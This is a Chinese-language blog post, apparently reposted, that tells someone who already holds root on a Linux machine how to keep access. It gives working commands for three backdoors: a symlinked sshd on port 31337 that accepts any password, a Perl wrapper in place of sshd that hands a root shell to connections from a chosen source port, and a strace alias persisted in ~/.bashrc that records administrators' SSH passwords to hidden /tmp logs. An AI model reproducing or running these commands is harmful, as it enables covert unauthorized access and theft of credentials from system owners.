linux后门
来源:互联网 发布:linux 文件最后修改人 编辑:程序博客网 时间:2024/06/08 00:34
如果你登陆到一台linux设备,并且拿到了了root权限,但是你不希望他丢,那么你要建立后门
首先第一种方法:
ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337
登陆的方式是:
ssh root@ip -p 31337
密码随意
这种方法不太稳定,经常会因为各种原因失效。
第二种方法:
[root@localhost ~]# cd /usr/sbin[root@localhost sbin]# mv sshd ../bin[root@localhost sbin]# echo '#!/usr/bin/perl' >sshd[root@localhost sbin]# echo 'exec "/bin/sh" if (getpeername(STDIN) =~ /^..4A/);' >>sshd[root@localhost sbin]# echo 'exec {"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshd[root@localhost sbin]# chmod u+x sshd[root@localhost sbin]# /etc/init.d/sshd restartPs:关于重启sshd的时候的遇到问题的解决方法:kill -HUP $(cat /var/run/sshd.pid)
登陆:
socat STDIO TCP4:ip:22,sourceport=13377
如果我们想继续渗透下去,也就是记录管理员通过本机登陆其他机子的密码的话要这样:
alias ssh='strace -o /tmp/.sshpwd-`date +%d%h%m%s`.log -e read,write,connect -s2048 ssh'
ssh密码会记录在:/tmp的目录底下以.sshpwd开头的文件:
查看的话就是:
cat /tmp/.sshpwd*.log | tail -n 11
就可以找到密码了
但是如果你要是退出shell或者重启系统,那么这个记录密码的功能就会消失,我们想要这个功能永久生效怎么办?
把:alias ssh='strace -o /tmp/.sshpwd-`date +%d%h%m%s`.log -e read,write,connect -s2048 ssh'
这个写在~/.bashrc 中就可以记录管理员登陆的其他的机子的密码了
有些机子里面没有strace,你要自己下载并且手动编译才行:
下载地址:
http://sourceforge.net/project/showfiles.php?group_id=2861&package_id=2819
参考:http://down.jdsec.com/secbook-7/%E4%B9%A6%E5%AE%89-%E7%AC%AC%E4%B8%83%E6%9C%9F.pdf
- Linux后门
- Linux后门
- linux后门
- Linux后门零接触
- Linux后门零接触
- linux下后门分类
- 检查linux后门- 笔记
- Linux内核后门
- Linux服务器后门问题
- Linux后门技术及实践
- Linux后门技术及实践
- linux下的一个后门
- Linux共享库注入后门
- Linux 共享库注入后门
- Linux 安全之SSH后门
- Linux系统安全之ssh后门
- linux后门rootkit程序介绍
- 后门
- ajax后台处理响应(java)
- jenkins在centos下的安装
- Android学习笔记(43):Java开发SQLite程序
- TextView之二:常用属性
- 转:Java 自带的数据加密类MessageDigest(MD5或SHA加密)
- linux后门
- “Entity Data Modle Designer 无法显示”的问题
- 前端编码规范总结-01
- 欢迎使用CSDN-markdown编辑器
- Java常见面试题_2016
- 最新Spinner用法详解
- Mac 安装MySQL到移动硬盘
- AngularJS 世界------Angularjs指令的使用方式和自定义指令
- Ant之build.xml详解